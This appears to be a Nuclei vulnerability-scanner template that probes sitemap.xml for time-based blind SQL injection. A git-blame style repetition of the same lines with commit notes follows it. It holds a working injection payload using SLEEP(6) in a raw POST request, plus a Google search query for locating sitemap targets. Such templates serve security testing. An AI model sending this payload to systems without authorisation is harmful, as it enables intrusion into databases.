nuclei-templates/http/vulnerabilities/other/sitemap-sql-injection.yaml

id: sitemap-sql-injection

info:
  name: Sitemap - SQL Injection
  author: Aravind
  severity: high
  reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19
  metadata:
    google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap
    max-request: 1
  tags: misconfig,sitemap,sqli

http:
  - raw:
      - |
        @timeout: 15s
        POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(header, "application/xml") && contains(body, "sitemap>")'
        condition: and
minor -changes 2023-07-06 07:00:22 +00:00			`id: sitemap-sql-injection`

			`info:`
			`name: Sitemap - SQL Injection`
			`author: Aravind`
			`severity: high`
			`reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19`
			`metadata:`
			`google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap`
TemplateMan Update [Fri Jul 7 11:14:01 UTC 2023] :robot: 2023-07-07 11:14:01 +00:00			`max-request: 1`
minor -changes 2023-07-06 07:00:22 +00:00			`tags: misconfig,sitemap,sqli`

			`http:`
			`- raw:`
			`- \|`
			`@timeout: 15s`
			`POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'duration>=6'`
			`- 'status_code == 200'`
			`- 'contains(header, "application/xml") && contains(body, "sitemap>")'`
Rename http/misconfiguration/sitemap-sql-injection.yaml to http/vulnerabilities /other/sitemap-sql-injection.yaml 2023-07-07 11:09:23 +00:00			`condition: and`